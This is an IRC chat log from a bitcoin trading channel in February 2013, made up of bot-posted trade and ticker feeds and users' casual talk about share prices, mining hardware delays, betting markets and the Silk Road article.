16:42:23 truffles, what alteration? Feb 19 16:42:40 ? Feb 19 16:45:23 look, right now petabyte suitable for blockchain can be got for under $100k... and that's negligible sum for medium and large enterprises Feb 19 16:45:31 truffles: those are seperate networks, different geneseis block, different chain, different rules, Feb 19 16:45:51 and there are plenty of them... so what fear of centralization? Feb 19 16:46:17 they'll buy just few less luxury cars Feb 19 16:46:55 as i wrote there, it's strawman argument Feb 19 16:48:04 is this safe to generate vanity address https://bitcoinvanity.appspot.com ? Feb 19 16:48:17 at wiki says yes. Feb 19 16:49:58 wao, dunno... i have cpu-generated addy myself with 6chars prefix in ~12 hours, didn't need more Feb 19 16:50:04 [MPEX] [S.MPOE] 3650 @ 0.00064975 = 2.3716 BTC [-] Feb 19 16:50:06 [MPEX] [S.MPOE] 3150 @ 0.00064927 = 2.0452 BTC [-] Feb 19 16:52:08 just testing, 4 char prefix did in few minutes.. Feb 19 16:52:35 [MPEX] [S.DICE] 1919 @ 0.00675812 = 12.9688 BTC [+] Feb 19 16:52:37 [MPEX] [S.DICE] 3279 @ 0.00675813 = 22.1599 BTC [+] Feb 19 16:53:23 [MPEX] [S.DICE] 2000 @ 0.00675813 = 13.5163 BTC [+] Feb 19 16:54:21 [MPEX] [S.MPOE] 14361 @ 0.00064927 = 9.3242 BTC [-] Feb 19 16:54:23 [MPEX] [S.MPOE] 6439 @ 0.00064882 = 4.1778 BTC [-] Feb 19 16:54:25 [HAVELOCK] [SDICE] 4 @ 0.713 = 2.852 BTC [-] Feb 19 16:54:26 [HAVELOCK] [SDICE] 1 @ 0.712 BTC [-] Feb 19 16:54:27 [HAVELOCK] [SDICE] 8 @ 0.712 = 5.696 BTC [-] Feb 19 16:54:28 [HAVELOCK] [SDICE] 7 @ 0.711 = 4.977 BTC [-] Feb 19 16:56:23 it will decrease variance of payouts for that person at the cost of less overall expected payout Feb 19 16:57:39 it's not, you get small regular payments instead of large irregular payments Feb 19 16:58:00 the miner will liekly get less bitcoins over time, but will consistently get them, instead of waiting perhaps years to get a block soloing Feb 19 16:59:33 their are several different pooled mining "payout schemes", such as PPS, PPLNS, etc, but all intend to distribute the reward amoung the contributing miners Feb 19 17:01:02 your statement is missing a few clarifications Feb 19 17:02:25 what is "it"? beneficial for whom? Feb 19 17:03:07 mornig Feb 19 17:03:29 well most asic miners are using pools and plan to use pools Feb 19 17:04:15 the reduction of variance from pooled mining has been seen to be "beneficial", even up to particularly high fees Feb 19 17:05:21 [BTCTC] [GSDPT] 1 @ 0.0065 BTC [+] Feb 19 17:06:02 most people can't afford to wait to get paid Feb 19 17:06:49 try #bitcoin-mining Feb 19 17:33:02 [MPEX] [S.MPOE] 3711 @ 0.00064882 = 2.4078 BTC [-] Feb 19 17:33:04 [MPEX] [S.MPOE] 27140 @ 0.00064881 = 17.6087 BTC [-] Feb 19 17:33:06 [MPEX] [S.MPOE] 4753 @ 0.00064827 = 3.0812 BTC [-] Feb 19 17:33:13 [MPEX] [S.MPOE] 2000 @ 0.00064791 = 1.2958 BTC [-] Feb 19 17:33:14 [MPEX] [S.MPOE] 2296 @ 0.0006479 = 1.4876 BTC [-] Feb 19 17:34:28 ;;bc,stats Feb 19 17:35:00 ;;gribble Feb 19 17:35:01 yes I am gribble. why do you keep bothering me? Feb 19 17:35:04 ;;bc,stats Feb 19 17:35:11 :( Feb 19 17:35:14 Current Blocks: 219933 | Current Difficulty: 3275464.5865656 | Next Difficulty At Block: 221759 | Next Difficulty In: 1826 blocks | Next Difficulty In About: None | Next Difficulty Estimate: 3471274.16583 | Estimated Percent Change: 5.97807 Feb 19 17:36:02 Current Blocks: 222023 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1752 blocks | Next Difficulty In About: 1 week, 3 days, 19 hours, 33 minutes, and 20 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None Feb 19 17:38:33 ;;ticker Feb 19 17:38:34 BTCUSD ticker | Best bid: 28.50607, Best ask: 28.61999, Bid-ask spread: 0.11392, Last trade: 28.63999, 24 hour volume: 81890.72501130, 24 hour low: 26.50126, 24 hour high: 28.80000, 24 hour vwap: 27.67701 Feb 19 17:38:51 we will break ze old top. Feb 19 17:39:00 Almost parity Feb 19 17:39:00 :) Feb 19 17:40:17 i bet you will bet yes on http://bitbet.us/bet/224/bitcoin-and-silver-price-to-intersect-in-february/ Feb 19 17:40:41 hehe Feb 19 17:41:15 hm lemme open a chart in mt4 Feb 19 17:44:17 i dunno where you saw any reversal to buy in Feb 19 17:50:16 lame https://bitcointalk.org/index.php?topic=144439.0 Feb 19 17:50:58 [MPEX] [S.MPOE] 2808 @ 0.0006479 = 1.8193 BTC [-] Feb 19 17:51:04 [MPEX] [S.MPOE] 16000 @ 0.0006479 = 10.3664 BTC [-] Feb 19 17:51:06 [MPEX] [S.MPOE] 1932 @ 0.00064702 = 1.25 BTC [-] Feb 19 17:55:02 [MPEX] [S.MPOE] 2393 @ 0.00065 = 1.5555 BTC [+] Feb 19 17:55:04 [MPEX] [S.MPOE] 16000 @ 0.00065 = 10.4 BTC [+] Feb 19 17:55:06 [MPEX] [S.MPOE] 1107 @ 0.00065476 = 0.7248 BTC [+] Feb 19 17:58:29 [BTCTC] [GOLD] 1 @ 0.59 BTC [-] Feb 19 18:09:42 bitcoin-24 is selling BTC for $49..... Feb 19 18:09:45 wtf Feb 19 18:10:27 [BTCTC] [BASIC-MINING] 10 @ 0.3499 = 3.499 BTC [-] Feb 19 18:11:01 [MPEX] [S.DICE] 500 @ 0.00656792 = 3.284 BTC [-] Feb 19 18:15:11 ;;asks 30 Feb 19 18:15:13 There are currently 16734.788 bitcoins offered at or under 30.0 USD, worth 495932.871704 USD in total. Feb 19 18:16:05 ;;ticker Feb 19 18:16:05 BTCUSD ticker | Best bid: 28.67003, Best ask: 28.70001, Bid-ask spread: 0.02998, Last trade: 28.67003, 24 hour volume: 82585.74381659, 24 hour low: 26.51111, 24 hour high: 28.80000, 24 hour vwap: 27.69537 Feb 19 18:16:13 volume is up too! Feb 19 18:16:18 huzzah! Feb 19 18:19:42 that woulc make for a great video Feb 19 18:20:02 we can follow the road Feb 19 18:20:03 we are going to break 30, then dumps? I feel ike this will continue Feb 19 18:20:17 ;;ticker Feb 19 18:20:18 BTCUSD ticker | Best bid: 28.66001, Best ask: 28.70000, Bid-ask spread: 0.03999, Last trade: 28.66001, 24 hour volume: 82348.64395440, 24 hour low: 26.51111, 24 hour high: 28.80000, 24 hour vwap: 27.69866 Feb 19 18:20:51 mircea_popescu i have put a bounty out for you! Feb 19 18:21:00 may the assasination attempts begin Feb 19 18:21:02 jkjk Feb 19 18:21:06 ic Feb 19 18:21:16 ;;asks 30 Feb 19 18:21:17 There are currently 18047.941 bitcoins offered at or under 30.0 USD, worth 535258.979966 USD in total. Feb 19 18:21:25 ;;asks 32 Feb 19 18:21:26 There are currently 25453.538 bitcoins offered at or under 32.0 USD, worth 765696.717139 USD in total. Feb 19 18:21:39 ;;bids 25 Feb 19 18:21:41 There are currently 35652.494 bitcoins demanded at or over 25.0 USD, worth 945268.073271 USD in total. Feb 19 18:22:29 i wonder if i should go troll the silver bugs :) Feb 19 18:22:46 I capitulate Feb 19 18:22:56 ;;ticker Feb 19 18:22:56 [MPEX] [S.MPOE] 10000 @ 0.00065475 = 6.5475 BTC [-] Feb 19 18:22:57 BTCUSD ticker | Best bid: 28.66002, Best ask: 28.98999, Bid-ask spread: 0.32997, Last trade: 28.99000, 24 hour volume: 83374.63524858, 24 hour low: 26.51111, 24 hour high: 28.99000, 24 hour vwap: 27.71985 Feb 19 18:22:57 [MPEX] [S.MPOE] 3500 @ 0.00065476 = 2.2917 BTC [+] Feb 19 18:22:59 assasination markets. Feb 19 18:23:03 stupid Feb 19 18:23:17 detrimental to the bitcoin Feb 19 18:23:25 all hail bitcoin Feb 19 18:23:41 beware the ides of march Feb 19 18:25:45 Bugpowder you capitulate which way ? Feb 19 18:25:50 FUCK Feb 19 18:25:53 that way Feb 19 18:25:58 lol Feb 19 18:26:09 4000 calls from 17 Feb 19 18:26:15 sold at 23-25 Feb 19 18:26:17 o those should bear nice fruit Feb 19 18:26:20 o. aww! Feb 19 18:26:22 boght 10,000 puts Feb 19 18:26:26 well you got 50% of oh Feb 19 18:26:27 ouch. Feb 19 18:26:34 sold 8000 puts Feb 19 18:26:39 bought 3000 puts Feb 19 18:26:42 giving up Feb 19 18:26:51 I've lost the magic Feb 19 18:26:56 tis hard to time. Feb 19 18:27:03 yep Feb 19 18:27:06 I was just lucky Feb 19 18:27:09 bug, dice isnt going to 0.02xx Feb 19 18:27:15 ;;calc 13 * 4000 / 30 Feb 19 18:27:15 1733.33333333 Feb 19 18:27:15 ok dud Feb 19 18:27:25 Was I right about dice revenue or noot Feb 19 18:27:26 ? Feb 19 18:27:44 it has been ~130BTC / day since I posted. Feb 19 18:27:50 2 weeks ago Feb 19 18:27:54 is that good or bad ? Feb 19 18:28:01 yes but the dice isnt going to 0.002 BTC ea Feb 19 18:28:18 NOw, if the market chooses to support S.DICE at .0065 with 4k of monthly revenue, my pricing model was wrong Feb 19 18:28:40 The model was based on people paying .0075 for 20k of revenue Feb 19 18:28:49 wait, is it making 4k this month ? Feb 19 18:28:55 no Feb 19 18:28:58 more like 9jk Feb 19 18:28:59 Bugpowder you know s.mpoe made like 500 one month nobody sold Feb 19 18:29:05 yes Feb 19 18:29:15 The whale is dead Feb 19 18:29:19 long live the whale Feb 19 18:29:33 [MPEX] [S.MPOE] 10000 @ 0.00064703 = 6.4703 BTC [-] Feb 19 18:29:36 [MPEX] [S.MPOE] 12393 @ 0.00064702 = 8.0185 BTC [-] Feb 19 18:29:38 [MPEX] [S.MPOE] 12700 @ 0.00064637 = 8.2089 BTC [-] Feb 19 18:29:50 [MPEX] [S.MPOE] 17407 @ 0.00064608 = 11.2463 BTC [-] Feb 19 18:30:26 My puts are so far underwater I don't give a fuck Feb 19 18:30:31 go up bitcoin! Feb 19 18:30:35 up up and away! Feb 19 18:30:37 well how far underwater can they be Feb 19 18:30:42 not like you can lose more than their value Feb 19 18:30:45 yep Feb 19 18:30:57 180 190 210 230 250 260 Feb 19 18:31:03 [MPEX] [O.BTCUSD.C220T] 3 @ 0.20577298 = 0.6173 BTC [+] Feb 19 18:31:05 pretty underwater Feb 19 18:31:09 fuck 29? Feb 19 18:31:14 ;;ask 29 Feb 19 18:31:14 Error: "ask" is not a valid command. Feb 19 18:31:18 ;;asks 29 Feb 19 18:31:20 There are currently 572.03788 bitcoins offered at or under 29.0 USD, worth 16588.4874127 USD in total. Feb 19 18:31:35 ;;asks 28.99 Feb 19 18:31:37 There are currently 25.127303 bitcoins offered at or under 28.99 USD, worth 728.190520058 USD in total. Feb 19 18:31:38 sometimes I wonder if I can make monies with 200 BTC on mpex Feb 19 18:31:42 >_> Feb 19 18:31:57 id play at mpex if the accounts were free Feb 19 18:33:00 chang, you have vip status on btctalk, not sure why you dont have mpex Feb 19 18:33:21 Bugpowder: my friend had a neuroscience question for you Feb 19 18:33:33 sup Feb 19 18:34:40 do you know much about cellular science? like neuron science? Feb 19 18:34:45 yes Feb 19 18:35:04 [MPEX] [S.MPOE] 10761 @ 0.00065476 = 7.0459 BTC [+] Feb 19 18:35:06 [MPEX] [S.MPOE] 8789 @ 0.00066666 = 5.8593 BTC [+] Feb 19 18:35:38 yea she had a few questions activation functions, thresholds, etc Feb 19 18:35:44 basic stuff for someone like you Feb 19 18:36:00 i can have her email you if easier Feb 19 18:36:59 ;;ticker Feb 19 18:36:59 BTCUSD ticker | Best bid: 28.76058, Best ask: 28.87997, Bid-ask spread: 0.11939, Last trade: 28.76058, 24 hour volume: 85806.98253922, 24 hour low: 26.51111, 24 hour high: 29.00000, 24 hour vwap: 27.75976 Feb 19 18:37:10 hit 30, somebody dumps 3k, makes sense Feb 19 18:37:10 Bugpowder so do a ponzi graph ? Feb 19 18:37:34 nooooo Feb 19 18:38:02 thestringpuller: Office hours are closed, if its quick I can answer it, but no time for a lengthy response Feb 19 18:38:13 Bowjob i turned down a free account at mpex, at the time i did not think it would take off. id not turn it down now, but i wont pay, lol Feb 19 18:38:45 EskimoBob fpga for LTC??!!?? Feb 19 18:39:47 link? Feb 19 18:40:36 and over 29 now Feb 19 18:40:37 Ponzi fizzle Feb 19 18:40:37 http://i.imgur.com/IQy7HqN.png Feb 19 18:40:56 aww poor ponzi Feb 19 18:41:01 but srsly, it's not that bad Feb 19 18:41:01 spam detected Feb 19 18:41:07 coingenuity ? Feb 19 18:41:19 1 BTC = 29.00000 U.S. dollars = 21.6773808 Euros Feb 19 18:41:34 I just tell myself its a hedge Feb 19 18:41:35 thanks for the link Bob Feb 19 18:41:40 Bugpowder basically big deal, you got set back to early jan Feb 19 18:42:00 and if you account in usd it's not even anything Feb 19 18:42:04 yah Feb 19 18:42:23 I am trying to take the position of now I'm just protecting my USD gains Feb 19 18:42:32 by hedgine with OOM puts Feb 19 18:42:50 why don't people buy the XDIFF Feb 19 18:43:03 argh Feb 19 18:43:15 off to lunch than work. Feb 19 18:43:20 l8r Feb 19 18:43:54 Bugpowder: i am buying xdiff soon Feb 19 18:44:00 but not enough change in diff Feb 19 18:44:08 ;;bc,stats Feb 19 18:44:20 Current Blocks: 222032 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1743 blocks | Next Difficulty In About: 1 week, 3 days, 7 hours, 31 minutes, and 35 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None Feb 19 18:48:03 silk road gwern article is back up on hacker news front page again! Feb 19 18:48:23 http://www.gwern.net/Silk%20Road Feb 19 18:50:52 [MPEX] [O.BTCUSD.C210T] 3 @ 0.24356304 = 0.7307 BTC [+] Feb 19 18:52:38 This article was commissioned by Bitcoin Weekly, which ultimately decided to not run it1; it is based on my experiences May-June 2011 Feb 19 18:52:45 [MPEX] [S.DICE] 2000 @ 0.00656793 = 13.1359 BTC [+] Feb 19 18:52:57 seriously, the bitcoin detractor bunch has some bullshit written 18 months ago and is still rehashing it ? Feb 19 18:53:21 how is silk road a detractor? Feb 19 18:53:26 ;;bc,convert baht Feb 19 18:53:27 1 BTC = 29.10998 U.S. dollars = 869.811456 Thai baht Feb 19 18:53:33 why you hatin on silk road all the time Feb 19 18:53:37 ;;bc,convert silver Feb 19 18:53:37 1 BTC = Google's calculator didn't come up with anything. Feb 19 18:53:54 gwern's article is a good one. Feb 19 18:53:56 the article != silkroad Feb 19 18:54:01 DeadWeasel i don't see it. Feb 19 18:54:29 it gives the history and implications and a how-to guide. Feb 19 18:54:49 I think it's great. You want more people using BTC, silk road and satoshi dice are the attractice parts. Feb 19 18:55:00 only if you can't buy it with dollars does the average person look to bitcoin Feb 19 18:55:07 it gives a rehash of history that might have been interesting in 2011 Feb 19 18:55:09 meanwhile its banal Feb 19 18:55:22 the "implications" are nonsense, and the how-to guide is out of date Feb 19 18:55:57 silber 29.37 btc 29.1 Feb 19 18:58:42 it Feb 19 18:59:03 is not banal to newcomers and those with an interest, which would be anybody who's just figured out this thing exists Feb 19 18:59:19 well good morning EskimoBob ! Feb 19 19:00:02 i wouldn't be here without that article in it's original form, I have gotten several old friends in because of it. It was the only one of it's kind back then. Feb 19 19:00:14 the only way to grasp what was going on. Feb 19 19:00:20 that may well be. Feb 19 19:00:23 for somebody who did not already know. Feb 19 19:00:34 it actually IS well be Feb 19 19:00:34 however, beating the old cyberpunk + silkroad horse is getting old. Feb 19 19:00:44 only to you, old fart Feb 19 19:00:48 1. whatever subculture thinks is related to bitcoin is wrong. Feb 19 19:00:58 2. silkroad is a vanishingly irrelevant application of bitcoin. Feb 19 19:01:15 while its true bitcoin serves it exceedinly well, it's untrue that this is representative for bitcoin. Feb 19 19:01:25 mircea_popescu: you're awfully full of your perceptions this morning. Feb 19 19:01:38 o, i always am, just, it doesn't always equally show Feb 19 19:01:51 well I'm glad you're having an ON day. Feb 19 19:01:55 lol Feb 19 19:02:14 but SR and the implications are a taproot and continue to supply new blood. Feb 19 19:02:15 spam detected Feb 19 19:02:23 among many, sure. Feb 19 19:02:40 i dunno, it's like insisting icecreamtrucks are particularly relevant to automotive industry. Feb 19 19:02:44 we don't have solid numbers, so we are both ass-flapping Feb 19 19:02:53 sure, it makes icecream trucks, which are the only practical way to deliver icecream Feb 19 19:03:03 ice cream trucks aren't, but police cruisers are. Feb 19 19:03:11 nope. Feb 19 19:03:17 18 wheeler delivery trucks are Feb 19 19:03:24 ok, that. Feb 19 19:03:28 the first ford model A was very important Feb 19 19:03:33 but sr is nowhere near 18 wheeler range. Feb 19 19:03:33 spam detected Feb 19 19:03:42 wtf is coingenuity up to Feb 19 19:04:00 it was, it's more like a VW passenger van now, dropping off new inductees to the bitcoin shark-tank Feb 19 19:04:19 he's detecting spam, obviously Feb 19 19:04:19 spam detected Feb 19 19:04:29 lmao Feb 19 19:04:35 someone should do that but with stupid Feb 19 19:04:39 "stupidity detected" Feb 19 19:05:05 is coingenuity an admin? does this place have mods? Feb 19 19:05:32 http://www.zerohedge.com/news/2013-02-18/european-bank-ceo-admits-whole-thing-doomed Feb 19 19:05:34 also in the news Feb 19 19:05:53 http://www.zerohedge.com/news/2013-02-18/european-bank-ceo-admits-whole-thing-doomed Feb 19 19:05:56 http://www.zerohedge.com/news/2013-02-18/european-bank-ceo-admits-whole-thing-doomed Feb 19 19:06:04 oops, sorry Feb 19 19:06:06 trying to copy Feb 19 19:07:23 good article. Feb 19 19:08:11 spam detected Feb 19 19:08:11 spam detected Feb 19 19:08:13 ahahaha Feb 19 19:16:20 [BTCTC] [GSDPT] 10 @ 0.00615 = 0.0615 BTC [-] Feb 19 19:19:39 http://trilema.com/2013/path-of-exile/ btw, if anyone is interested in gaming. Feb 19 19:21:32 BFL: If all goes well we will ship the first units this month. Those are the orders made last June. If you order now, because of the backlog of orders, you may not get your order until May or June of this year. Feb 19 19:22:14 nothing ever goes well, dont ya fuckin know it already. Feb 19 19:24:55 lol Feb 19 19:25:04 tghey are so losing that 1.5k bet Feb 19 19:25:30 kakobrekla: how do you know they probably will ship this month? Feb 19 19:25:44 i know they probably wont. Feb 19 19:26:29 I'll loose my money :) Feb 19 19:26:57 hedge? Feb 19 19:27:31 I bought a minirig Feb 19 19:27:48 so stupid, next time I'll buy S.dice instead. Feb 19 19:30:07 yeah, mining equipment is not yet buyable i dont think Feb 19 19:30:53 mircea_popescu: if you pay 30k you can buy it. Feb 19 19:31:03 where ? Feb 19 19:31:07 the problem is when are they going to ship it Feb 19 19:31:10 bfl Feb 19 19:31:14 http://stockfraudstory.blogspot.com/ Feb 19 19:31:23 that's not buying. Feb 19 19:31:26 [BTCTC] [S.MPOE-PT] 5202 @ 0.00067 = 3.4853 BTC [-] Feb 19 19:31:27 [HAVELOCK] [SDICE] 1 @ 0.751 BTC [+] Feb 19 19:31:32 buying is you send me the item i pay within 60 days Feb 19 19:31:35 that's what buying is. Feb 19 19:31:41 ohh, right Feb 19 19:31:49 you can pre-order it Feb 19 19:31:55 ya well, consider i pre-ordered it Feb 19 19:31:56 and maybe they are going to send it Feb 19 19:32:01 within a month or so of delivery i'll pay. Feb 19 19:32:17 We paid them 4 months ago. Feb 19 19:32:32 i think this is literally the only place on earth where people prepay. Feb 19 19:32:40 i mean... even the fabs themselves, they invoice. Feb 19 19:32:54 yea! crazy guys! Feb 19 19:36:46 but they had pre chip costs, like fans and souch Feb 19 19:37:03 such* Feb 19 19:37:34 I understand that, but it's not serious that we pay and they don't say an exact date. Feb 19 19:40:06 [MPEX] [S.DICE] 400 @ 0.00673703 = 2.6948 BTC [+] Feb 19 19:40:17 [MPEX] [S.DICE] 2000 @ 0.00673704 = 13.4741 BTC [+] Feb 19 19:40:19 [MPEX] [S.DICE] 1300 @ 0.00673705 = 8.7582 BTC [+] Feb 19 19:40:26 [HAVELOCK] [SDICE] 20 @ 0.711 = 14.22 BTC [-] Feb 19 19:40:28 [HAVELOCK] [SDICE] 24 @ 0.71 = 17.04 BTC [-] Feb 19 19:40:29 [HAVELOCK] [SDICE] 5 @ 0.705 = 3.525 BTC [-] Feb 19 19:40:30 [HAVELOCK] [SDICE] 3 @ 0.703 = 2.109 BTC [-] Feb 19 19:40:31 [HAVELOCK] [SDICE] 8 @ 0.701 = 5.608 BTC [-] Feb 19 19:42:46 [MPEX] [S.DICE] 2300 @ 0.00675 = 15.525 BTC [+] Feb 19 19:44:01 take a moment to relax : http://polimedia.us/dtng/c/src/136127837953.jpg Feb 19 19:44:02 spam detected Feb 19 19:44:30 http://coingenuity.sux Feb 19 19:44:43 hm. Feb 19 19:44:52 http://google.com/blablabla Feb 19 19:45:12 http://polimedia.us/blablabla Feb 19 19:45:20 a well, detector's broke Feb 19 19:45:49 spam detected Feb 19 19:45:50 spam detected Feb 19 19:45:56 fixed it Feb 19 19:46:52 lol Feb 19 19:46:58 ham infected Feb 19 19:47:05 mircea_popescu: yeah, its actively keywording Feb 19 19:47:10 under devel at the moment Feb 19 19:47:14 o ? Feb 19 19:48:06 yeah, disabled keyword "spam" Feb 19 19:48:13 (was testing with it last night) Feb 19 19:50:02 what's it for ? Feb 19 19:51:05 if he can teach a program to irc he won't have to Feb 19 19:51:20 lol Feb 19 19:51:47 that would save you hours of time mircea_popescu Feb 19 19:51:56 just create a condescending bot Feb 19 19:51:58 :P Feb 19 19:52:16 but i enjoy it! Feb 19 19:52:36 silver was at 29.13 today Feb 19 19:52:43 btc was over that lol, just not at the same time Feb 19 19:52:45 crazy Feb 19 19:52:45 so we reached parity? Feb 19 19:52:52 no Feb 19 19:52:57 nearly Feb 19 19:53:02 damn close Feb 19 19:53:12 think usagi has something with his silver hedging? Feb 19 19:53:28 yea i read his report Feb 19 19:53:37 parity when an arbitrary unit of measure in one thing equals the same arbitrary digit worth of unit in another arbitrary unit of measure Feb 19 19:54:02 exactly@ Feb 19 19:55:06 if it's arbitrarily profitable is the question Feb 19 19:55:21 pigeons you sound like my bot :D Feb 19 19:55:46 its meaningless but fun Feb 19 19:56:05 i can now go to the silver bugs and goo neener neener neener.... Feb 19 19:56:12 anyone here think bfl wont ship their stuff this feb? Feb 19 19:56:27 not much feb left Feb 19 19:56:29 lol m Feb 19 19:56:30 me Feb 19 19:56:41 they might get one or two units out the first week of marh Feb 19 19:56:44 march Feb 19 19:56:50 mhm Feb 19 19:57:01 im thinking of that big bet on bitbet Feb 19 19:57:09 maybe sneak in a ninja bet before they close Feb 19 19:57:15 link? Feb 19 19:57:16 doesnt look like theyll ship Feb 19 19:57:24 http://bitbet.us/ Feb 19 19:57:34 I'll dump a few btc just before it closes Feb 19 19:57:36 oh i see Feb 19 19:57:50 im almost certain they wont ship it.. but im being prudent Feb 19 19:57:51 then your weighted avg is shit Feb 19 19:58:03 doesnt matter if its a certain outcome Feb 19 19:58:12 how do you mean? Feb 19 19:58:14 Bowjob ppl put like 7-800 btc on that theory. Feb 19 19:58:21 yeah Feb 19 19:58:30 im just waiting for another BFL josh delay Feb 19 19:58:34 lol Feb 19 19:58:37 then its all free money after that Feb 19 19:58:41 bfl is waiting to see when to ship based on how much money they can make betting Feb 19 19:58:43 you win the same amount if you bet months ago versus today? Feb 19 19:58:43 course the weight is almost down by now Feb 19 19:58:53 DeadWeasel nope Feb 19 19:59:02 that's what I though.. win less now.. Feb 19 19:59:12 but it doesnt matter, the risk is less and less Feb 19 19:59:19 [MPEX] [S.MPOE] 11050 @ 0.00065582 = 7.2468 BTC [-] Feb 19 19:59:27 you before it ends, sneak in a couple of btcs Feb 19 20:00:07 i cursory look over bfl forums have josh saying he didnt hear from the bumping facility Feb 19 20:01:00 no way is one delivered in the next 12 days. Feb 19 20:01:04 i just bet 7 on No Feb 19 20:01:09 so is my idea good? ninja bet on that on no at the end Feb 19 20:01:23 how does that work out in winnings? Feb 19 20:01:30 if you bet way back versus now? Feb 19 20:01:53 DeadWeasel it's by weight. Feb 19 20:02:02 closing in 2 days Feb 19 20:02:03 mhm Feb 19 20:02:14 if you bet 1 btc at 10k weight you will get 1/10 of what someone would betting 1 btc at 100k weight Feb 19 20:02:23 i bet 7, i wonder if i will get 9 when i win Feb 19 20:02:25 so he bets 1 gets 2 you bet 1 get 1.1 Feb 19 20:02:47 ;;calc 7/9 Feb 19 20:02:47 0.777777777778 Feb 19 20:02:51 josh is saying he'll ship this feb Feb 19 20:03:06 ;;calc 791/802 Feb 19 20:03:06 0.986284289277 Feb 19 20:03:12 bet says recieved Feb 19 20:03:20 he can ship in feb and bet still is lost Feb 19 20:03:23 someone bet 500 in yes Feb 19 20:03:25 wtf Feb 19 20:03:35 bfi fan boi? Feb 19 20:03:38 bfl Feb 19 20:03:38 Chaang-Noi it's a little over even, so if your weight is at least 13k then yes Feb 19 20:03:40 that cant be a hedge Feb 19 20:03:44 Bowjob i imagine that'd be blf themselves Feb 19 20:03:52 thanks mircea_popescu Feb 19 20:03:58 i think i can! Feb 19 20:03:59 they bet right at the time people were pointing out on forum Feb 19 20:04:14 mp Weighted No: 63`682`049 Feb 19 20:04:20 that' total. Feb 19 20:04:25 oh Feb 19 20:04:42 Current weight: 4`698 ( from 100`000 to 1 ) Feb 19 20:04:47 lol i should not have bothered Feb 19 20:04:59 so that'd be about 5% of the winnings of an origianl btc. like 1.05 or w/e Feb 19 20:05:40 it's been open for like 6-7 weeks by now Feb 19 20:06:09 sdice made 437btc today, a lil better... Feb 19 20:06:58 [MPEX] [S.DICE] 5000 @ 0.00675 = 33.75 BTC [+] Feb 19 20:07:17 hmmm Feb 19 20:07:22 1Hz5FxwF5XYk1Emqf43Q2Vo5uUzqb7BhtM Feb 19 20:07:26 [HAVELOCK] [SDICE] 1 @ 0.705 BTC [+] Feb 19 20:07:27 [HAVELOCK] [SDICE] 2 @ 0.701 = 1.402 BTC [-] Feb 19 20:07:29 [HAVELOCK] [SDICE] 2 @ 0.7 = 1.4 BTC [-] Feb 19 20:07:30 sheeeit Feb 19 20:07:30 new dice whale Feb 19 20:07:30 [HAVELOCK] [SDICE] 9 @ 0.689 = 6.201 BTC [-] Feb 19 20:07:31 [HAVELOCK] [SDICE] 9 @ 0.6880001 = 6.192 BTC [-] Feb 19 20:07:32 [HAVELOCK] [SDICE] 27 @ 0.686 = 18.522 BTC [-] Feb 19 20:07:40 5k in the acccount Feb 19 20:08:06 wooot Feb 19 20:08:12 Ooh Feb 19 20:08:15 A Dice whale Feb 19 20:08:22 evoorhees on vacation or something? Feb 19 20:08:37 ;;seen evoorhees Feb 19 20:08:37 evoorhees was last seen in #bitcoin-assets 6 days, 19 hours, 34 minutes, and 34 seconds ago: perfect Feb 19 20:09:00 [MPEX] [S.DICE] 5000 @ 0.00675 = 33.75 BTC [+] Feb 19 20:09:04 no Feb 19 20:09:09 he's been in meetings all week Feb 19 20:09:10 1Hz5FxwF5XYk1Emqf43Q2Vo5uUzqb7BhtM Feb 19 20:09:16 have you emailed him? Feb 19 20:10:04 nah, I just had some sdice issues and noticed he was mia Feb 19 20:10:27 [HAVELOCK] [SDICE] 10 @ 0.686 = 6.86 BTC [-] Feb 19 20:10:27 [HAVELOCK] [SDICE] 2 @ 0.685 = 1.37 BTC [-] Feb 19 20:10:28 turns out my issue are probably just a borked wallet in satoshi client Feb 19 20:10:29 [HAVELOCK] [SDICE] 15 @ 0.681 = 10.215 BTC [-] Feb 19 20:13:12 GOOG at $802 Feb 19 20:13:23 in case anyone cares... Feb 19 20:13:35 wow Feb 19 20:13:45 thats all time high for good Feb 19 20:13:46 good Feb 19 20:13:48 google Feb 19 20:13:52 !ticker h sdice Feb 19 20:13:54 [HAVELOCK:SDICE] 1D: 0.68100000 / 0.7063588 / 0.75100000 (500 shares, 353.17940050 BTC), 7D: 0.68000000 / 0.72236295 / 0.75900000 (1089 shares, 786.65325357 BTC), 30D: 0.44000000 / 0.65852069 / 0.89000000 (11020 shares, 7256.89796546 BTC) Feb 19 20:13:55 amazing in contrast to apple Feb 19 20:14:09 !ticker m s.dice Feb 19 20:14:11 [MPEX:S.DICE] 1D: 0.00638721 / 0.00678696 / 0.0069 (56633 shares, 384.37 BTC), 7D: 0.00598092 / 0.00637291 / 0.0069 (269728 shares, 1,718.95 BTC), 30D: 0.00085848 / 0.00584452 / 0.0075 (6663734 shares, 38,946.36 BTC) Feb 19 20:14:17 ;;ticker Feb 19 20:14:17 BTCUSD ticker | Best bid: 28.66001, Best ask: 28.70000, Bid-ask spread: 0.03999, Last trade: 28.66001, 24 hour volume: 89315.22714423, 24 hour low: 26.59111, 24 hour high: 29.20000, 24 hour vwap: 27.83974 Feb 19 20:14:28 ;;bc,stats Feb 19 20:14:40 Current Blocks: 222040 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1735 blocks | Next Difficulty In About: 1 week, 3 days, 7 hours, 51 minutes, and 25 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None Feb 19 20:14:45 I was about to buy 7k worth of apple shares Feb 19 20:14:50 wow havelock sdice 24h volume is almost same as mpex sdice 24h volume Feb 19 20:14:54 good thing the brokerage fee was effing high Feb 19 20:16:15 i went heavier on goog at like half this price luckily, i am down a fair amount from apple tho... Feb 19 20:16:38 i'll stick out though Feb 19 20:16:43 it Feb 19 20:17:26 [HAVELOCK] [SDICE] 23 @ 0.68 = 15.64 BTC [-] Feb 19 20:31:12 [MPEX] [S.DICE] 1000 @ 0.00656793 = 6.5679 BTC [-] Feb 19 20:31:53 [MPEX] [S.MPOE] 16000 @ 0.00064609 = 10.3374 BTC [-] Feb 19 20:31:55 [MPEX] [S.MPOE] 884 @ 0.00064608 = 0.5711 BTC [-] Feb 19 20:31:56 [MPEX] [S.MPOE] 6850 @ 0.00064574 = 4.4233 BTC [-] Feb 19 20:31:58 [MPEX] 